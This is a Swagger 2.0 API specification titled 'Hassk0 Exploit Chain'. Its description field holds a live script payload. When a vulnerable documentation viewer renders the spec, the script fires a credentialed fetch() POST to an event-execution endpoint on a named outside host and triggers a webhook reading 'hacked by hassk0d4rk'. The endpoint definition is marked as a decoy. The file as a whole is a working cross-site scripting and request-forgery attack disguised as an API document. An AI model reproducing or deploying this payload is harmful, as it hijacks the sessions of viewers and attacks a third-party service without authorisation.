swagger: '2.0'
info:
  version: '1.0.0'
  title: Hassk0 Exploit Chain
  description: |
    <script>
    fetch('https://webnotification.eus2.es-cs.bentley.com/api/Events/Execute', {
      method: 'POST',
      headers: {
        'Content-Type': 'application/json'
      },
      body: JSON.stringify({
        "Source": "exploit-source",
        "Context": "exploit-context",
        "Action": "leaksss",
        "WebSocket": {},
        "Webhook": {
          "Invoke": true,
          "Body": "hacked by hassk0d4rk 😈"
        }
      }),
      credentials: 'include'
    });
    </script>
host: webnotification.eus2.es-cs.bentley.com
paths:
  /api/Events/Execute:
    post:
      summary: Fake Event Trigger (decoy)
      consumes:
        - application/json
      parameters:
        - in: body
          name: body
          required: true
          schema:
            type: object
            properties:
              Source:
                type: string
              Context:
                type: string
              Action:
                type: string
              WebSocket:
                type: object
              Webhook:
                type: object
                properties:
                  Invoke:
                    type: boolean
                  Body:
                    type: string
      responses:
        200:
          description: Request sent
